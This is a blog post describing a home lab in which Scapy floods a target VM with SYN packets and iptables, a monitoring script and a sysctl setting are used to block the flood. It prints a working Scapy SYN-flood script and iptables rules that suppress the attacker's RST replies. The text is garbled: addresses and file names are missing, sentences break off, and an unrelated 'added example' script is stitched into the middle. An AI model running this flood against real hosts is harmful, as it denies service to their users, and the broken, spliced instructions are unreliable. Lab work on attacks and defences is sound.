Saturday, May 14, 2011

Subodh Pachghare
SYN Packet Generation by Scapy & SYN Flood Prevention using iptables
Recently I played with iptables & got into a situation where I had to prevent SYN Floods using iptables. So here is my
solution for this. SYN Flood packet generation is done by Scapy to simulate the DDoS through multiple
Oracle VirtualBox virtual machines running Ubuntu 10.04 server. Works for me. :)

Attackers' Configuration:

I am using three virtual machines of Ubuntu Server 10.04 here, connected through the "Host-only" network
adapter of VirtualBox. is the Target server, & are the Attackers.
Install the Scapy tool for packet generation; I am using version 2.2.0 here. Extract the Scapy source & run
the following command
root@ubiserv:~# python install

run Scapy using

For attacking the Target server at, insert the following rule into the Attacker's systems, i.e.
root@ubiserv:~# iptables -A OUTPUT -p tcp -s --tcp-flags RST RST -j DROP
root@ubiserv:~# iptables -A OUTPUT -p tcp -s --tcp-flags RST RST -j DROP

Note - iptables rules only apply to the kernel stack, not above it. For example, the iptables rule will not apply
to packets generated by Scapy. The Scapy packet crafting tool creates the whole packet in its own space, hence
the iptables rule does not hold there. The malformed/manipulated packets crafted by Scapy will still be seen
by the kernel, resulting in replies/responses/resets from the kernel. This can be prevented by using iptables, so
that the kernel will not respond to the Scapy packets. After sending the SYN packets to Target the Attacker's Kernel
This rule will DROP the packets from on the OUTPUT chain with the RST flag set, preventing
from resetting the connection.
script contents
#! /usr/bin/env python
# CyberSpace Name : HaX0R (Cyberninja)
# Website :
# Description : SYN Flood Packet creation for iptables prevention solution

import sys

from scapy.all import *
#conf.verb=0
print "Field Values of packet sent"
p=IP(dst=sys.argv[1],id=1111,ttl=99)/TCP(sport=RandShort(),dport=[22,80],seq=12345,ack=1000,window=1000,flags="S")/"HaX0r SVP"
ls(p)
print "Sending Packets in 0.3 second intervals for timeout of 4 sec"
ans,unans=srloop(p,inter=0.3,retry=2,timeout=4)
print "Summary of answered & unanswered packets"
unans.summary()
#for s,r in ans:
# print r.sprintf(" \t %TCP.flags%")
ans.make_table(lambda(s,r): (s.dst, s.dport, r.sprintf(" \t %IP.ttl% \t %TCP.flags%")))

SYN Flood python script can be downloaded here.

Usage of the script will be like this
root@ubiserv:~# python

This script sends SYN packets to ports 22 & 80 from random source port numbers
using the RandShort() function. The script will also print the details of the crafted packet used for the
attack. Finally the script reports the SA (SYN-ACK) responses & gives the result as answered & unanswered
Kernel closes it. This is the SYN Flood condition. Millions of unanswered SYN requests to the Target can cause
the backlog buffer to fill up completely, leaving it unable to serve legitimate clients as there are no memory resources left.
This is the typical DDoS (Distributed Denial of Service) attack, initiated in a real scenario from multiple IP
addresses across the globe. Generally speaking, these kinds of attacks are carried out with
the help of botnets or other compromised systems.
DDOS scenario. 25 attempts from every single IP address are allowed to take care of packet loss; after that,
SYN packets from these IPs will be rejected as an intentional flooding case & the IP address logged for tracking
time interval the script goes into sleep. If more IP connections are observed it is recommended to use a
lower number of seconds.
Use the script like this
root@ubiserv:~# ./ 4
while true;
conntrack=`netstat | grep -E "ssh|www" | grep -iv ESTABLISHED | awk '{print $5}' | cut -d : -f 1 | grep $pip
cat /tmp/test1.txt | sort | uniq > /tmp/test2.txt
Iptables shell script can be downloaded here.
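The prevention logic described above (count half-open connections per source IP, block and log the IP once it passes the 25-attempt limit, sleep for the chosen interval), written out as an added example; this is not the post's downloadable script. It assumes `netstat -nt` output columns (local address in column 4, foreign address in column 5, state last), the `synguard` log tag and the /tmp/synguard_blocked file, and the ssh/www port filter the post's script uses.

```shell
#!/bin/sh
# Added example (not the post's downloadable script): count half-open SYN_RECV
# connections to ssh/www per remote IP from `netstat -nt` output, list the IPs
# over a threshold, and drop further SYNs from them with iptables, logging each.

# Constructed sample of `netstat -nt` lines (not real traffic): 203.0.113.5 has
# 3 half-open ssh/www connections, 198.51.100.7 has 1 plus one on port 443,
# and the ESTABLISHED line must be ignored.
SAMPLE_NETSTAT='tcp        0      0 192.0.2.10:22         203.0.113.5:40001      SYN_RECV
tcp        0      0 192.0.2.10:80         203.0.113.5:40002      SYN_RECV
tcp        0      0 192.0.2.10:22         203.0.113.5:40003      SYN_RECV
tcp        0      0 192.0.2.10:22         198.51.100.7:51000     SYN_RECV
tcp        0      0 192.0.2.10:443        198.51.100.7:51001     SYN_RECV
tcp        0      0 192.0.2.10:22         198.51.100.9:51500     ESTABLISHED'

# flooders LIMIT: read netstat output on stdin and print each remote IP with
# more than LIMIT half-open connections to port 22 or 80, sorted, one per line.
flooders() {
    awk -v limit="$1" '
        $NF == "SYN_RECV" && $4 ~ /:(22|80)$/ {
            ip = $5; sub(/:[0-9]+$/, "", ip); count[ip]++
        }
        END { for (ip in count) if (count[ip] > limit) print ip }' | sort
}

# block_ip IP: insert an INPUT rule dropping new SYNs from IP and log it.
# With DRY_RUN set it only reports what it would do (used by the test).
block_ip() {
    if [ -n "${DRY_RUN:-}" ]; then
        echo "would block $1"
        return 0
    fi
    iptables -I INPUT -s "$1" -p tcp --syn -j DROP
    logger -t synguard "blocked $1 for exceeding the SYN_RECV limit"
}

# monitor_loop INTERVAL LIMIT: poll netstat every INTERVAL seconds and block
# each offender once; the post uses 25 attempts and a 4 second interval.
monitor_loop() {
    while true; do
        netstat -nt | flooders "$2" | while read -r ip; do
            grep -qx "$ip" /tmp/synguard_blocked 2>/dev/null && continue
            block_ip "$ip" && echo "$ip" >> /tmp/synguard_blocked
        done
        sleep "$1"
    done
}
# Polling starts only when run as: ./synguard.sh --monitor 4 25
if [ "${1:-}" = "--monitor" ]; then monitor_loop "${2:-4}" "${3:-25}"; fi
```

Remote IPv6 addresses are handled by stripping only the trailing ":port", but as the comment thread below notes, a spoofed source address will simply show up as a new IP to be counted and blocked.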
Further, the SYN_ACK retries also have to be lowered, so that the SYN_RECV state
default value of 5 in Linux. 5 SYN_ACK retries will cause the older port connections to close in 3 minutes,
resulting in lots of stale connections & memory resource consumption. This can be reduced to 1 so that the
older SYN_RECV connections will close in 10 seconds if no reply is received from the initiator. Set the parameter
in the following way.

Add the following line to /etc/sysctl.conf

net.ipv4.tcp_synack_retries = 1

Commit the changes made in sysctl using

root@ubiserv:~# sysctl -p /etc/sysctl.conf

Verify it using
root@ubiserv:~# cat /proc/sys/net/ipv4/tcp_synack_retries
1

Now the old connections will end in 10 sec as only one SYN_ACK retry is sent. So this is it for SYN Flood
prevention. I will post more about iptables in later posts. Please drop me a mail if you think of using this & of
course for any suggestions or problems. The mail address can be found in the Contact Me section. Happy rooting.

[Image: Attack Scenario]

[Image: Snapshot: Scapy python script output on the Attacker's system]

Posted by Subodh Pachghare

Labels: Information Security, iptables, Kernel, Linux/Unix, network, Networking, Programming, python, scapy, shell script, SYN,
SYN Flood, tcp


Unknown September 26, 2013 at 12:17 AM

Good and lucid explanation!

My 2 cents - the preventive measure of blocking a particular IP when >25 SYN pkts come from it could be
easily bypassed by making SCAPY spoof the IP addresses ;)


Subodh Pachghare September 26, 2013 at 7:38 PM

Yeah, you are absolutely right, an attacker can easily spoof the IP address and come back to launch SYN
packets; however, the new spoofed IP address will be banned too by the prevention script. The idea here is to block
all connections that are intentionally trying to exhaust socket memory.


